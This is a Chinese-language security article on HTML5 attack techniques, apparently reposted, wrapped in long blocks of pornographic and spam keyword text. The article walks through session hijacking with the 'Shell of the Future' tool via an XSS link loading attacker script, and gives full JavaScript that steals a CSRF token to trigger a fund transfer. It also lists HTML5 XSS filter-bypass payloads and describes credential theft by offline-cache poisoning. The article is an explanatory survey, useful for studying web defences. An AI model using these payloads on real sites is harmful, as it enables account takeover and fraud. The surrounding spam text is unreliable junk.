精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

揭密HTML5帶來的攻擊手法

安全 應用安全
本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

HTML5 是下一代的HTML,HTML5賦予網頁更好的意義和結構。更加豐富的標簽將隨著對RDFa的,微數據與微格式等方面的支持,構建對程序、對用戶都更有價值的數據驅動的Web。基于HTML5開發的網頁APP擁有更短的啟動時間,更快的聯網速度。本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

揭密HTML5帶來的攻擊手法 

一、CORS(Cross-Origin Resource Sharing) 跨域資源共享

為了構建高品質的網站,以及滿足日益增長的用戶需求,HTML5針對SOP(同源策略)放寬了一些限制,簡單的說,同源策略允許來自同一站點的頁面訪問其頁面的方法和屬性等,但限制了跨域調用其他頁面的方法和屬性。現在HTML5放寬了這些限制,XMLHttpRequest Level 2新增了功能CORS協議,允許Ajax發起跨域的請求,瀏覽器是可以發起跨域請求的,比如你可以外鏈一個外域的圖片或者腳本。但是Javascript腳本是不能獲取這些資源的內容的,它只能被瀏覽器執行或渲染。

COR是頁面層次的控制模式。每一個頁面需要返回一個名為‘Access-Control-Allow-Origin’的HTTP頭來允許外域的站點訪問。你可以僅僅暴露有限的資源和有限的外域站點訪問。在COR模式中,訪問控制的職責可以放到頁面開發者的手中,而不是服務器管理員。當然頁面開發者需要寫專門的處理代碼來允許被外域訪問。

所以只要b.com允許,a.com可以使用ajax獲取A上任意數據,國外安全研究者Lava Kumar開發了一款工具“Shell of the future”。

Shell of the Future 是一個反向Web Shell處理工具(Reverse Web Shell handler)。利用跨站腳本攻擊或瀏覽器地址欄注入javascript以后,Shell of the Future可進行劫持會話。 它利用了HTML5支持的Cross Origin Requests,可以繞過一些反會話劫持的方法,如HTTP-Only限制的cookie,幫定IP地址的會話ID。

下載地址

如何使用該工具:

1、下載并解壓該工具,雙擊“Shell of the Future.exe”,會彈出一個窗口。

揭密HTML5帶來的攻擊手法

 

2、輸入任意端口,點擊“Start”。

3、使用瀏覽器訪問http://127.0.0.1:8008/sotf.console (firefox效果最佳)

4、不出問題,你將看到以下畫面。(Shell of the Future有兩個JavaScript的exp- e1.js和e2.js,我們可以利用XSS漏洞將其嵌入到受害者的瀏覽器)

揭密HTML5帶來的攻擊手法

 

5、當一個用戶登錄下面的測試網站:

http://www.testfire.net/bank/login.aspx (admin/admin)

該站點的搜索功能粗在一個XSS漏洞,http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

6、攻擊者發送一個惡意鏈接給用戶,如下:

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

7、當用戶點擊之后,攻擊者的IP地址將會發送給攻擊者,然后點擊“Hijack Session”:

揭密HTML5帶來的攻擊手法 

8、點擊Hijack Session之后,將出現如下畫面:

揭密HTML5帶來的攻擊手法 #p#

二、竊取CSRF令牌(token)

目前很多互聯網站點都在使用token來防御CSRF攻擊,但是隨著HTML5技術的普及,攻擊者很有可能竊取到CSRF的token,如果CSRF token的請求URL(GET請求),利用前面提到的CORS協議,攻擊者可以注入一個CSRF payload跨域請求到目標站點上。當然,利用的話需要服務端添加一個HTTP 頭字段“origin”,并且需要設置該屬性withCredentials為true,讓我們來看看如何利用:

1、某用戶登錄www.bank.com。

2、假設該站點有CSRF保護,即在表單提交的地方添加了隱藏的token,然后發送GET請求到服務端進行驗證,如下:

揭密HTML5帶來的攻擊手法

3、攻擊者通過email、IM聊天工具或其他方式發送一個惡意站點ww.attackersite.com4、攻擊者可以提交一個Ajax請求到www.bank.com并且執行一些操作,但是需要知道CSRF的token值。5、所以攻擊者需要竊取到token令牌,然后進行CSRF攻擊。

6、攻擊者編寫了下面的一段代碼,發送Ajax請求到ConfirmTransfer.jsp頁面并接受其響應,在返回的數據包中搜索csrfToken,找到后,另外一個Ajax請求被發送,其中包含了CSRF token。

<!DOCTYPE html><html><head><script>function testing(){var xmlhttp;if (window.XMLHttpRequest)
  {
  xmlhttp=new XMLHttpRequest();
  }else
  {
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.open("GET","http://bank/Myapp/ConfirmTransfer.jsp",false);
xmlhttp.send();if(xmlhttp.status==200){var str=xmlhttp.responseText;var n=str.search("csrfToken");var final=str.substring(n+18,n+28);var url = 
"http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&amp;
Account=1234&amp;csrfToken=" + escape(final);
xmlhttp.open("GET", url, true);
xmlhttp.send();}}</script></head><body onload="testing();"></body></html>

以上的一切操作全在后臺進行,用戶完全不知情,因此,在HTML5中,攻擊者完全可能獲取到CSRF TOKEN和執行一些操作。#p#

三、訪問內部服務器:

很多互聯網公司除了有ONLINE對外的業務之外,在內部也用著很多的應用,如財務管理系統、員工管理系統以及其他的一些內部社區等,很多開發者為了各個應用之間調用簡潔方便,在很多應用中都添加了以下頭:

Control-Allow-Origin: *

攻擊者可以利用社會工程學,讓內部用戶點擊一個鏈接,然后攻擊者就可以訪問到內部的一些資源,以下為操作步驟:

1、員工登錄到內部的某應用,如www.internalurl.com

2、internalurl服務器返回的響應頭設置了Access-Control-Allow-Origin: *(允許任何域發起的請求都可以獲取當前服務器的數據。)

3、員工受到一封郵件,點擊了鏈接 – www.malicioussite.com

4、這個站點包含了正常的UI內容,所以員工一般不會察覺,但是,該頁面包含了一段javascript代碼。

5、該javascript代碼會發送一個XMLHttpRequest請求。

6、分析返回的數據包,并把它發送到攻擊者的服務器。

7、攻擊者獲取到公司內部站點的相關信息。#p#

四、HTML5新的XSS攻擊載體

直到現在,還有很多開發者總喜歡開發自己定義的XSS黑名單過濾器,以阻止XSS攻擊,包含了大多網絡上常見的XSS利用的代碼,如img、script等,HTML5中引入了很多新的標簽屬性,如audio和vedio標簽,新的標簽帶來了新的事件,會繞過現有的過濾器,以下為收集的HTML5存在跨站的標簽:

<video> <source onerror=”javascript:alert(1)”><video onerror=”javascript:alert(1)”><source><audio onerror=”javascript:alert(1)”><source><input autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”

五、離線Web應用緩存中毒:

大部分瀏覽器都支持HTML離線緩存技術,如Google Chrome, Mozilla, Opera以及Safari,在給用戶帶來便捷的同時,也引發了一些列的安全威脅,如很有可能遭受“緩存中毒”的攻擊。如果攻擊者在網站上嵌入特定的JS文件,能夠控制用戶的賬戶。HTML5提供了manifest功能,它是html5提供的離線web應用解決方案,它的作用有兩個:

1. 連網情況下,訪問使用manifest的頁面時(之前曾經訪問過),會先加載一個manifest文件,如果這個manifest文件沒有改變,頁面相關的資源便都來自瀏覽器的離線緩存,不會再有額為的網絡請求,從而大大提高頁面相應時間

2. 斷網時,在瀏覽器地址欄輸入頁面url,仍然能夠正常顯示頁面,以及正常使用不依賴ajax的功能

利用這個功能,攻擊者可以竊取用戶的憑據,利用方法如下:

1、某黑木耳在星巴克鏈接到了一個不安全的WI-FI網絡環境。(攻擊者打造)

2、該黑木耳登錄新浪微博,攻擊者可劫持。

3、攻擊者設置該網站返回一個頁面,該頁面包含了一個隱藏的iframe,提示新浪微博登陸。

4、由于該網絡是由攻擊者控制,所以他提供的新浪微博登陸頁面中包含了manifest屬性,除了可以當場劫持到黑木耳的微博帳號密碼之外,后面還可以長期劫持。

5、當黑木耳喝完老干媽牌拿鐵之后,拿著心愛的神舟牌筆記本回家之后,想繼續曬自己的照片,繼續登錄微博。

6、瀏覽器會從緩存中載入偽造的登錄頁面。

7、帳號密碼隨后會發送到攻擊者。

因此,通過manifest屬性可以竊取用戶的憑據,以上都是一些已經研究出來的攻擊手法,相信隨著HTML5的高度發展,未來幾年內會出現更多的攻擊手法。

原文地址:http://resources.infosecinstitute.com/demystifying-html-5-attacks/

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-09-11 10:57:58

HTML5

2012-07-26 10:40:38

HTML5

2010-08-11 09:43:54

FlexHTML5

2012-06-05 10:48:23

2012-09-21 10:01:56

HTML5JS資訊

2012-05-21 10:05:10

HTML5

2013-01-24 10:26:04

HTML5HTML 5HTML5的未來

2014-08-26 10:54:20

2011-05-13 17:36:05

HTML

2023-03-16 09:00:00

HTML5HTML語言

2013-01-04 13:39:51

2013-01-04 13:30:04

2013-01-04 11:22:12

2013-01-04 11:40:54

2019-05-13 10:42:53

2010-08-30 11:55:28

2013-10-21 15:24:49

html5游戲

2011-12-08 10:59:07

2013-01-04 11:38:35

2013-01-04 13:14:22

點贊
收藏

51CTO技術棧公眾號

欧美亚洲另类在线一区二区三区| 一区二区亚洲精品国产| 欧美图片激情小说| 亚州视频一区二区三区| 日韩国产一区二| 久久精品99久久香蕉国产色戒| 国产精品偷伦视频免费观看了 | 99国产精品久久久久久久久久| 91福利视频网| 日本一级特级毛片视频| 午夜欧洲一区| 日韩亚洲欧美高清| 18岁视频在线观看| 日皮视频在线观看| 国产视频一区二区在线| 亚洲自拍小视频| 日本黄色中文字幕| 欧美区国产区| 中文字幕一区二区三区电影| 激情综合激情五月| 国产精品诱惑| 狠狠久久五月精品中文字幕| 日本久久高清视频| 成人午夜在线观看视频| 成人午夜免费电影| 成人激情在线观看| 国产成人无码专区| 国产精品视频一区二区三| 日韩黄色影院| 久久久久久久综合日本| 国产精品v欧美精品∨日韩| 天天干天天插天天射| 亚洲精品九九| 欧美理论片在线观看| 538精品视频| 免费av一区| 日韩第一页在线| 麻豆tv在线观看| 国产成年精品| 欧美日本免费一区二区三区| 九色porny91| 欧美成人影院| 欧美性极品xxxx做受| 欧日韩免费视频| 日本在线视频www鲁啊鲁| 综合久久久久久久| 在线观看日韩片| 男人的天堂在线视频免费观看 | 成人免费看片网址| 亚洲一区二区色| 日本不卡一区二区| 国产精品成人av性教育| 亚洲日本视频在线观看| 国产欧美精品| 91产国在线观看动作片喷水| 精品午夜福利视频| 在线播放精品| 午夜精品久久久久久久久久久久 | av中文字幕在线| 国产婷婷一区二区| 亚洲高清视频一区| 免费大片黄在线观看视频网站| 国产精品毛片久久久久久| 亚洲欧洲精品在线| 欧美尤物美女在线| 亚洲男帅同性gay1069| 一区二区免费在线观看| a级网站在线播放| 一区二区三区蜜桃| 欧美视频在线观看网站 | 国产精品男人的天堂| 中文字幕免费视频观看| 蜜臀av性久久久久蜜臀aⅴ| 国产美女高潮久久白浆| 国产不卡精品视频| 成人18视频在线播放| 久久精品午夜一区二区福利| 欧洲成人av| 国产精品入口麻豆九色| 激情视频小说图片| 国产激情视频在线看| 色乱码一区二区三区88| 成人黄色一级大片| 高清精品视频| 一区二区三欧美| 久久r这里只有精品| 亚洲精品乱码| 国产精品视频久久| 成人福利小视频| 97se狠狠狠综合亚洲狠狠| 日韩在线国产| 色婷婷av在线| 在线一区二区视频| 波多野结衣免费观看| 国产丝袜一区| 日韩在线视频线视频免费网站| 欧美色图一区二区| 久久精品成人| 91美女片黄在线| 久久久影视精品| 黄色av网站免费| 国内精品久久久久影院薰衣草| 成人av蜜桃| xxxxx日韩| 亚州成人在线电影| 五月天婷婷影视| 日韩激情毛片| 欧美日韩xxx| 国产亚洲久一区二区| 成人综合在线视频| 在线观看成人一级片| 在线成人av观看| 欧美va亚洲va国产综合| www久久久久久久| 亚洲精品激情| 91嫩草免费看| 免费观看久久久久| 欧洲精品一区二区| 久久久久9999| 国产精品大片| 亚洲综合日韩中文字幕v在线| 久久经典视频| 黑人巨大精品欧美一区免费视频 | 少妇高潮喷水在线观看| 亚洲男女网站| 中文字幕国产精品| 午夜婷婷在线观看| www.av精品| 久草视频这里只有精品| 日韩一区二区三区四区五区| 亚洲欧美日韩网| a v视频在线观看| 不卡欧美aaaaa| 国产精品无码免费专区午夜| 国产成人免费视频网站视频社区| 国产亚洲欧美日韩精品| 中文字字幕在线中文| www.欧美色图| 国产女大学生av| 久久精品国产亚洲5555| 欧美黑人狂野猛交老妇| 国产丰满美女做爰| 亚洲啪啪综合av一区二区三区| 成人亚洲精品777777大片| 欧美另类69xxxxx| 国产成人黄色av| 九色视频在线播放| 91久久精品一区二区| 自拍偷拍亚洲天堂| 久久男女视频| 日韩aⅴ视频一区二区三区| 日本高清不卡一区二区三区视频| 亚洲美女av在线播放| 中文字幕在线天堂| 欧美国产一区二区在线观看| 91香蕉视频污版| 色婷婷色综合| 91福利入口| 久久不射影院| 日韩av在线一区二区| 91精品国产乱码久久久张津瑜| 99久久精品国产精品久久| 女人喷潮完整视频| 精品香蕉视频| 成人性生交xxxxx网站| 亚洲妇熟xxxx妇色黄| 精品国产免费人成电影在线观看四季| 国产在线观看免费av| 91视频观看免费| 亚洲欧美另类动漫| 久久久9色精品国产一区二区三区| 91在线观看免费观看| 免费在线观看av电影| 日韩成人中文字幕| 亚洲 小说区 图片区| 亚洲色图欧洲色图婷婷| 国产美女视频免费观看下载软件| 夜夜精品视频| 亚洲va久久久噜噜噜久久狠狠| 91精品网站在线观看| 久久久久久久久爱| 国产免费a∨片在线观看不卡| 欧美日本一区二区在线观看| 久草视频精品在线| 国产视频一区二区在线| 亚洲国产综合av| 亚洲伊人网站| 精品日韩在线播放| 西野翔中文久久精品国产| 国产欧美亚洲视频| caoporn视频在线观看| 亚洲天堂免费在线| 亚洲xxxx天美| 欧洲一区二区三区在线| 精品无码一区二区三区电影桃花 | 精品视频一区二区三区四区五区| 久久精品精品电影网| 日韩性xxxx| 欧美日韩亚洲国产综合| 日韩精品一区二区在线播放 | 久一视频在线观看| 日本一区二区动态图| 人妻换人妻a片爽麻豆| 日本成人在线视频网站| 国产九色porny| 亚洲成人99| 欧美性天天影院| 国产91精品入| 91免费视频国产| 3d性欧美动漫精品xxxx软件| 久久久久久国产精品三级玉女聊斋 | 日韩精品视频网站| 男人插女人视频在线观看| 婷婷色综合网| 日韩欧美亚洲区| 丁香婷婷成人| 91九色视频在线| 成人激情视屏| 欧美中文在线观看| sm在线观看| 欧美成人网在线| 欧美成人视屏| 中文字幕av一区二区| 色视频精品视频在线观看| 日韩午夜av电影| 亚洲专区在线播放| 欧美亚洲综合久久| 在线能看的av| 精品成人国产在线观看男人呻吟| 中文字幕电影av| 国产精品女同一区二区三区| 中文字幕一区二区三区人妻| 国产精品538一区二区在线| 午夜在线观看av| 久久精品国产色蜜蜜麻豆| caoporn超碰97| 久久婷婷丁香| 日韩精品一区二区三区不卡| 美女诱惑一区| 国产精品无码专区av在线播放| 99pao成人国产永久免费视频| 国产在线xxxx| 亚洲天堂男人| 久久视频这里有精品| 亚洲成人中文| 奇米精品一区二区三区| 日韩午夜av在线| 777精品久无码人妻蜜桃| 99热免费精品| 哪个网站能看毛片| 久久亚洲欧美| 一区二区三区视频在线观看免费| 久久久久久亚洲精品杨幂换脸| 欧美日韩亚洲第一| 天堂资源在线中文精品| 久久午夜夜伦鲁鲁一区二区| 日韩激情视频在线观看| 欧美 激情 在线| 日韩精品福利网| 亚洲欧美日本一区二区三区| 韩国v欧美v日本v亚洲v| 毛毛毛毛毛毛毛片123| 国产福利电影一区二区三区| 日本性生活一级片| 久久中文娱乐网| 色欲狠狠躁天天躁无码中文字幕| 中文字幕成人网| av激情在线观看| 亚洲成人综合网站| 亚洲大片免费观看| 欧美精品丝袜久久久中文字幕| www.国产三级| 亚洲欧美激情另类校园| 一级毛片视频在线| 欧美激情xxxx性bbbb| 电影一区二区三| 亚洲va国产va天堂va久久| 国产精品毛片视频| 日本视频精品一区| 欧美成人69| 女人和拘做爰正片视频| 日韩av一二三| 黄色av电影网站| 国产午夜精品福利| 黄色一级免费视频| 黑人巨大精品欧美一区二区| 亚洲综合精品视频| 亚洲成人激情视频| 香蕉视频在线免费看| 欧美激情免费在线| 欧美aaaaaaaa| 国产一区二区三区奇米久涩| 成人羞羞网站入口免费| 欧美黄色免费网址| 日韩电影在线观看网站| 国产成人av免费观看| 日本最新中文字幕| 一区二区三区日韩欧美精品| 国产特黄大片aaaa毛片| 欧美日韩一级片在线观看| 国模私拍视频在线| 日韩在线精品视频| 天堂电影一区| 亚洲最大福利视频网| 中文字幕伦av一区二区邻居| 女人床在线观看| 日韩av一区二区三区四区| 在线看黄色的网站| 亚洲欧洲一区二区在线播放| 97免费在线观看视频| 日韩欧美美女一区二区三区| 大地资源中文在线观看免费版 | 在线天堂中文资源最新版| 91影视免费在线观看| 欧美一级精品片在线看| 鲁一鲁一鲁一鲁一色| 国产精品影音先锋| 国产主播av在线| 日韩欧美在线视频| 亚洲女人18毛片水真多| 久久久精品影院| 色综合天天色| 欧美自拍资源在线| 亚洲一区自拍| 久久久久久久久免费看无码 | 国产一区二区三区免费观看在线 | 日韩中文字幕不卡| 亚洲国产第一区| 亚洲午夜久久久久久久久电影院| 国产一区二区三区在线观看 | 精品国产乱码久久久久久丨区2区 精品国产乱码久久久久久蜜柚 | 日韩精品在线不卡| 亚洲成人av在线播放| h片在线播放| 91免费看国产| 中文在线播放一区二区| 午夜精品免费看| 国产精品欧美经典| 一级aaaa毛片| 色99之美女主播在线视频| 国产成人精选| 中文字幕一区二区中文字幕| 精品一区二区在线免费观看| 日本二区三区视频| 欧美精品第一页| 好吊日视频在线观看| 91色精品视频在线| 欧美福利视频| 国产探花一区二区三区| 亚洲自拍偷拍网站| 黄色片一区二区| 97香蕉超级碰碰久久免费软件| 成人动漫视频| 欧美精品99久久| 国产亚洲一区二区三区四区 | 国产福利精品导航| 国产一级在线免费观看| 亚洲精品xxx| 不卡av影片| 午夜久久资源| 国产在线一区观看| 久久精品视频久久| 亚洲热线99精品视频| 欧美123区| 中国女人做爰视频| 不卡视频一二三| 蜜臀99久久精品久久久久小说| 中文字幕精品av| 日韩精品中文字幕吗一区二区| 野外做受又硬又粗又大视频√| heyzo一本久久综合| 无码人妻熟妇av又粗又大| 精品国偷自产在线视频| 爱高潮www亚洲精品| 一本大道熟女人妻中文字幕在线| 国产偷国产偷亚洲高清人白洁 | 大香伊人久久| 91sa在线看| 成人a'v在线播放| 无码国产精品一区二区高潮| 天天亚洲美女在线视频| 国产粉嫩一区二区三区在线观看| 成人网址在线观看| 亚洲人成毛片在线播放女女| 极品蜜桃臀肥臀-x88av| 日韩欧美中文字幕一区| 樱桃视频成人在线观看| 精品国产无码在线| 91片在线免费观看| 97人妻精品一区二区三区动漫| 久久久久久久影院| 日韩精品电影| 久久久久成人精品无码中文字幕| 欧美性色黄大片手机版| 黄页网站在线| 亚洲不卡中文字幕| bt欧美亚洲午夜电影天堂| 亚洲一区精品在线观看| 91国产一区在线| 亚洲成人二区|